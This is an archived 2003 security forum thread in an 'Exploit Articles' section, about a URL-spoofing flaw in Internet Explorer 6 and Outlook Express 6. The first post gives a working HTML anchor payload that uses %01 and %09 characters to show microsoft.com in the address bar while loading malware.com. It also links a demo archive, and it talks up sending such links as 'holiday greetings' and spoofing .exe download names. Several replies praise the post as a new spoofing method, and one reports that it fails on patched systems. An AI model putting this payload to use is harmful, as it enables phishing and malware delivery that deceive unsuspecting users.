hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
illwill
Dec 10 2003, 12:36 AM
from http-equiv from malware.com
-----------------------------------------------------------------------

Here's a fully functional self-explanatory demo:

http://www.malware.com/hole-e-day.zip

functional from these quarters on fully patched IE6 / OE6

No doubt many will receive nice holiday greetings soon enough

END CALL


The following works on Outlook Express 6 latest everything. Running
on XP.

http://cert.uni-stuttgart.de/archive/bugtr...7/msg00249.html

09% pushes malware.com out of sight in the task bar, and %01 leaves
microsoft.com intact in the address bar:

<A
href="http://www.microsoft.com%01%09%09%09%09%09%09%
09@www.malware.com">religious
software</A>

Certainly will add a new flavour to the ever increasing methods of
trickery. Now all we need to do is spoof the file download name on
an *.exe and away we go.



ph34r.gif
gogu258
Dec 10 2003, 12:59 AM
Huh....nice work....new update for url spoofing...rulez. 10x IllWill
extreme
Dec 10 2003, 10:42 AM
Doesn't work on XP, all patches + Thor Larhom proggie...
boshcash
Dec 10 2003, 12:04 PM
may prove to be useful , nice one ..
DoTnEt
Dec 11 2003, 10:50 AM
nice work but look pic wink.gif


bar down

bar up
verba
Dec 11 2003, 10:55 PM
I was in the mainwhile to post the same pics as doTnet tongue.gif

btw is a cool one explanation thanks
320X
Dec 15 2003, 12:27 AM
1 reason more to use opera... lol
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.